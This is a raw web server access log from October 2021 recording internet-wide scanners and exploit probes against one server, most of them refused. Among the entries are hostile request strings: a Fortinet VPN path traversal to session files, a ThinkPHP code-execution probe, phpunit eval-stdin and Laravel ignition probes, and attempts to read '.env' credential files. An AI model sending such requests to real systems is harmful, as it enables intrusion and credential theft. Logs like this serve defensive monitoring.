45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [18/Oct/2021:21:22:59 +0000] 400 - POST https localhost "-" [Client 45.146.164.110] [Length 154] [Gzip -] "-" "-" [18/Oct/2021:21:50:02 +0000] 444 - GET https 64.22.31.253 "/" [Client 154.209.125.18] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" "-" [19/Oct/2021:01:32:44 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.202.129] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [19/Oct/2021:02:02:17 +0000] 444 - POST https 192.168.0.1 "/GponForm/diag_Form?style/" [Client 192.3.154.35] [Length 0] [Gzip -] "curl/7.3.2" "-" [19/Oct/2021:02:22:38 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.61.146.242] [Length 0] [Gzip -] "httpx - Open-source project (github.com/projectdiscovery/httpx)" "-" [19/Oct/2021:02:22:38 +0000] 400 - GET http 64.22.31.253 "/" [Client 45.61.146.242] [Length 252] [Gzip -] "httpx - Open-source project (github.com/projectdiscovery/httpx)" "-" [19/Oct/2021:03:01:57 +0000] 400 - - http localhost "-" [Client 89.248.165.120] [Length 154] [Gzip -] "-" "-" [19/Oct/2021:04:14:55 +0000] 444 - GET https 64.22.31.253 "/" [Client 184.105.247.194] [Length 0] [Gzip -] "-" "-" [19/Oct/2021:04:31:30 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.94.138.114] [Length 0] [Gzip -] "-" "-" [19/Oct/2021:04:31:32 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.94.138.114] [Length 252] [Gzip -] "-" "-" [19/Oct/2021:04:31:32 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.94.138.114] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [19/Oct/2021:04:39:20 +0000] 444 - GET https 64.22.31.253 "/" [Client 103.203.59.1] [Length 0] [Gzip -] "HTTP Banner Detection (https://security.ipip.net)" "-" [19/Oct/2021:04:58:48 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.200.61] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [19/Oct/2021:05:00:45 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.198.208] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [19/Oct/2021:05:03:06 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.208.162] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [19/Oct/2021:05:05:07 +0000] 400 - GET http localhost "/" [Client 185.189.182.234] [Length 154] [Gzip -] "-" "-" [19/Oct/2021:05:38:24 +0000] 444 - GET https 64.22.31.253 "/" [Client 71.6.232.7] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36" "-" [19/Oct/2021:10:02:50 +0000] 400 - - http localhost "-" [Client 87.251.75.63] [Length 154] [Gzip -] "-" "-" [19/Oct/2021:10:32:10 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [19/Oct/2021:10:53:04 +0000] 444 - GET https 64.22.31.253 "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [19/Oct/2021:10:53:04 +0000] 444 - GET https 64.22.31.253 "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [19/Oct/2021:11:18:12 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.206.215] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [19/Oct/2021:12:29:28 +0000] 400 - GET http 64.22.31.253 "/.env" [Client 109.237.103.118] [Length 654] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [19/Oct/2021:12:29:28 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 109.237.103.118] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [19/Oct/2021:14:27:38 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 103.153.76.212] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [19/Oct/2021:14:43:44 +0000] 400 - GET http fuwu.sogou.com "/404/index.html" [Client 222.186.19.235] [Length 654] [Gzip -] "Mozilla/5.0 (Macintosh; U; Mac OS X 10_6_1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/ Safari/530.5" "-" [19/Oct/2021:14:43:45 +0000] 400 - - http localhost "-" [Client 222.186.19.235] [Length 154] [Gzip -] "-" "-" [19/Oct/2021:14:51:06 +0000] 444 - GET https imap.moralanimal.net "/" [Client 34.96.130.18] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [19/Oct/2021:15:42:42 +0000] 400 - POST http 64.22.31.253 "/admin" [Client 45.61.146.242] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36" "-" [19/Oct/2021:15:45:42 +0000] 400 - GET http 64.22.31.253 "/.env" [Client 45.61.146.242] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36" "-" [19/Oct/2021:16:25:18 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [19/Oct/2021:16:25:18 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [19/Oct/2021:16:25:20 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [19/Oct/2021:16:25:22 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [19/Oct/2021:16:25:22 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [19/Oct/2021:16:25:23 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [19/Oct/2021:16:25:23 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [19/Oct/2021:16:25:25 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [19/Oct/2021:16:25:25 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [19/Oct/2021:16:25:27 +0000] 400 - POST https localhost "-" [Client 45.146.164.110] [Length 154] [Gzip -] "-" "-" [19/Oct/2021:16:25:28 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [19/Oct/2021:16:25:31 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [19/Oct/2021:16:25:31 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [19/Oct/2021:16:47:50 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.41.12] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [19/Oct/2021:17:36:23 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.35.168.112] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [19/Oct/2021:19:01:51 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [19/Oct/2021:19:57:21 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [19/Oct/2021:20:11:50 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.51.176] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [19/Oct/2021:20:36:14 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [19/Oct/2021:20:36:14 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [19/Oct/2021:20:36:14 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [19/Oct/2021:20:36:14 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [19/Oct/2021:20:36:14 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [19/Oct/2021:20:36:14 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [19/Oct/2021:21:28:13 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [19/Oct/2021:22:45:55 +0000] 444 - GET https 64.22.31.253 "/ReportServer" [Client 192.241.197.60] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [19/Oct/2021:23:05:40 +0000] 444 - GET https 64.22.31.253 "/login" [Client 192.241.210.75] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [20/Oct/2021:00:02:32 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.53.170.163] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [20/Oct/2021:00:06:29 +0000] 444 - GET https opds.moralanimal.net "/" [Client 34.96.130.20] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [20/Oct/2021:00:11:51 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.248.133.114] [Length 0] [Gzip -] "-" "-" [20/Oct/2021:00:11:54 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.114] [Length 252] [Gzip -] "-" "-" [20/Oct/2021:00:11:54 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.114] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [20/Oct/2021:00:40:16 +0000] 400 - GET http 64.22.31.253 "/" [Client 192.241.210.133] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [20/Oct/2021:00:53:39 +0000] 444 - GET https 64.22.31.253 "/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession" [Client 185.191.32.158] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36" "-" [20/Oct/2021:00:53:40 +0000] 400 - GET http 64.22.31.253 "/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession" [Client 185.191.32.158] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36" "-" [20/Oct/2021:01:34:28 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.198.186] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [20/Oct/2021:03:00:59 +0000] 444 - GET https agent.moralanimal.net "/" [Client 34.86.35.4] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [20/Oct/2021:03:29:43 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.51.176] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [20/Oct/2021:04:21:20 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [20/Oct/2021:04:42:58 +0000] 400 - - http localhost "-" [Client 66.240.205.34] [Length 154] [Gzip -] "-" "-" [20/Oct/2021:05:00:38 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.208.229] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [20/Oct/2021:05:01:09 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.200.61] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [20/Oct/2021:05:02:19 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 198.199.112.26] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [20/Oct/2021:05:18:41 +0000] 444 - GET https pop.moralanimal.net "/" [Client 34.77.162.9] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [20/Oct/2021:05:24:12 +0000] 444 - GET https 64.22.31.253 "/" [Client 65.49.20.67] [Length 0] [Gzip -] "-" "-" [20/Oct/2021:05:49:31 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.106.29.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0" "-" [20/Oct/2021:05:51:37 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.209.162] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [20/Oct/2021:07:41:09 +0000] 444 - GET https analytics.moralanimal.net "/analytics/jbips/" [Client 194.48.199.78] [Length 0] [Gzip -] "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 GTB5" "-" [20/Oct/2021:08:05:14 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.202.29] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [20/Oct/2021:08:25:15 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [20/Oct/2021:09:15:48 +0000] 444 - OPTIONS https 64.22.31.253 "/" [Client 34.133.230.52] [Length 0] [Gzip -] "-" "-" [20/Oct/2021:10:18:12 +0000] 400 - - http localhost "-" [Client 79.124.62.106] [Length 154] [Gzip -] "-" "-" [20/Oct/2021:10:30:58 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.1.248.42] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [20/Oct/2021:10:42:59 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.51.176] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [20/Oct/2021:12:00:11 +0000] 444 - OPTIONS https 64.22.31.253 "/" [Client 212.102.34.141] [Length 0] [Gzip -] "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-TW) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5" "-" [20/Oct/2021:12:04:04 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [20/Oct/2021:12:04:04 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [20/Oct/2021:12:04:10 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [20/Oct/2021:12:04:10 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [20/Oct/2021:12:04:10 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [20/Oct/2021:12:04:11 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [20/Oct/2021:12:04:12 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [20/Oct/2021:12:04:13 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [20/Oct/2021:12:04:15 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [20/Oct/2021:12:04:18 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [20/Oct/2021:12:04:18 +0000] 400 - POST https localhost "-" [Client 45.146.164.110] [Length 154] [Gzip -] "-" "-" [20/Oct/2021:12:04:19 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [20/Oct/2021:12:04:21 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [20/Oct/2021:12:23:23 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 103.153.78.125] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [20/Oct/2021:13:01:05 +0000] 444 - GET https 64.22.31.253 "///remote/fgt_lang?lang=/../../../..//////////dev/" [Client 178.239.21.101] [Length 0] [Gzip -] "python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.36.2.el7.x86_64" "-" [20/Oct/2021:13:04:36 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.202.132] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [20/Oct/2021:13:43:38 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [20/Oct/2021:14:50:04 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.41.12] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [20/Oct/2021:14:59:07 +0000] 400 - - https localhost "-" [Client 195.78.54.192] [Length 154] [Gzip -] "-" "-" [20/Oct/2021:15:21:17 +0000] 444 - GET https 64.22.31.253 "/" [Client 104.206.128.10] [Length 0] [Gzip -] "https://gdnplus.com:Gather Analyze Provide." "-" [20/Oct/2021:15:25:53 +0000] 444 - POST https 192.168.0.1 "/GponForm/diag_Form?style/" [Client 23.95.191.195] [Length 0] [Gzip -] "curl/7.3.2" "-" [20/Oct/2021:16:32:43 +0000] 444 - POST https 192.168.0.1 "/GponForm/diag_Form?style/" [Client 23.95.191.195] [Length 0] [Gzip -] "curl/7.3.2" "-" [20/Oct/2021:16:36:46 +0000] 400 - - http localhost "-" [Client 87.251.67.40] [Length 154] [Gzip -] "-" "-" [20/Oct/2021:18:04:44 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [20/Oct/2021:18:04:44 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [20/Oct/2021:18:04:44 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [20/Oct/2021:18:04:44 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [20/Oct/2021:18:04:44 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [20/Oct/2021:18:04:44 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [20/Oct/2021:18:44:29 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.1.248.26] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [20/Oct/2021:18:44:52 +0000] 444 - GET https 64.22.31.253 "/" [Client 185.180.143.148] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36" "-" [20/Oct/2021:18:44:53 +0000] 400 - GET http 64.22.31.253 "/" [Client 185.180.143.148] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36" "-" [20/Oct/2021:20:32:53 +0000] 444 - GET https 64.22.31.253 "/" [Client 176.58.113.12] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0" "-" [20/Oct/2021:21:42:14 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.133.58] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [20/Oct/2021:21:49:21 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 103.153.78.125] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [21/Oct/2021:00:18:15 +0000] 400 - HEAD http localhost "/" [Client 209.97.179.197] [Length 0] [Gzip -] "-" "-" [21/Oct/2021:00:18:16 +0000] 400 - GET http 64.22.31.253 "/system_api.php" [Client 209.97.179.197] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [21/Oct/2021:00:18:17 +0000] 444 - GET https 64.22.31.253 "/system_api.php" [Client 209.97.179.197] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 